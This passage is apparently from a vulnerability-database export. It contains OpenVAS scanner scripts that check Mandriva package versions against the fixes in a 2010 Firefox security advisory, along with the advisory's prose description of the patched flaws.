rpm:\"firefox-id~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.19.1~20.15mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.24.0~3.16mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.19.1~20.15mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:17:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0176", "CVE-2010-0165", "CVE-2010-0168", "CVE-2010-0174", "CVE-2010-0172", "CVE-2010-0175", "CVE-2010-0170", "CVE-2010-0167", "CVE-2010-1122", "CVE-2010-0164", "CVE-2010-0173", "CVE-2010-0178", "CVE-2010-0177", "CVE-2009-3555", "CVE-2010-0182", "CVE-2010-0181", "CVE-2010-1028", "CVE-2010-0179"], "description": "Check for the Version of firefox", "modified": "2017-12-19T00:00:00", "published": "2010-04-29T00:00:00", "id": "OPENVAS:831006", "href": "http://plugins.openvas.org/nasl.php?oid=831006", "type": "openvas", "title": "Mandriva Update for firefox MDVSA-2010:070-1 (firefox)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for firefox MDVSA-2010:070-1 (firefox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security issues were identified and fixed in firefox:\n\n Security researcher regenrecht reported (via TippingPoint's Zero Day\n Initiative) a potential reuse of a deleted image frame in Firefox 3.6's\n handling of multipart/x-mixed-replace images. Although no exploit was\n shown, re-use of freed memory has led to exploitable vulnerabilities\n in the past (CVE-2010-0164).\n \n Mozilla developers identified and fixed several stability bugs in the\n browser engine used in Firefox and other Mozilla-based products. Some\n of these crashes showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at least some\n of these could be exploited to run arbitrary code (CVE-2010-0165,\n CVE-2010-0167).\n \n Mozilla developer Josh Soref of Nokia reported that documents\n failed to call certain security checks when attempting to preload\n images. Although the image content is not available to the page, it\n is possible to specify protocols that are normally not allowed in a\n web page such as file:. This includes internal schemes implemented\n by add-ons that might perform privileged actions resulting in\n something like a Cross-Site Request Forgery (CSRF) attack against\n the add-on. Potential severity would depend on the add-ons installed\n (CVE-2010-0168).\n \n Mozilla developer Blake Kaplan reported that the window.location object\n was made a normal overridable JavaScript object in the Firefox 3.6\n browser engine (Gecko 1.9.2) because new mechanisms were developed\n to enforce the same-origin policy between windows and frames. This\n object is unfortunately also used by some plugins to determine the page\n origin used for access restrictions. A malicious page could override\n this object to fool a plugin into granting access to data on another\n site or the local file system. The behavior of older Firefox versions\n has been restored (CVE-2010-0170).\n \n Mozilla developer Justin Dolske reported that the new asynchronous\n Authorization Prompt (HTTP username and password) was not always\n attached to the correct window. Although we have not demonstrated\n this, it may be possible for a malicious page to convince a user\n to open a new tab or popup to a trusted service and then have the\n HTTP authorization prompt from the malicious page appear to be the\n login prompt for the trusted page. This potential attack is greatly\n mitigated by the fact that very few web sites use HTTP authorization,\n preferring instead to use web forms and cookies (CVE-2010-0172).\n \n Unspecified vulnerability in Mozilla Firefox 3.5.x ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"firefox on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00036.php\");\n script_id(831006);\n script_version(\"$Revision: 8164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-29 13:13:58 +0200 (Thu, 29 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:070-1\");\n script_cve_id(\"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0170\", \"CVE-2010-0172\", \"CVE-2010-1028\", \"CVE-2010-1122\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2009-3555\");\n script_name(\"Mandriva Update for firefox MDVSA-2010:070-1 (firefox)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"beagle\", rpm:\"beagle~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-crawl-system\", rpm:\"beagle-crawl-system~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-doc\", rpm:\"beagle-doc~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-epiphany\", rpm:\"beagle-epiphany~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-evolution\", rpm:\"beagle-evolution~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui\", rpm:\"beagle-gui~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui-qt\", rpm:\"beagle-gui-qt~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-libs\", rpm:\"beagle-libs~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp\", rpm:\"devhelp~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp-plugins\", rpm:\"devhelp-plugins~0.21~3.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany\", rpm:\"epiphany~2.24.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"epiphany-devel\", rpm:\"epiphany-devel~2.24.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-beagle\", rpm:\"firefox-ext-beagle~0.3.8~13.19mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-mozvoikko\", rpm:\"firefox-ext-mozvoikko~1.0~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.5.1~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.5.10~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 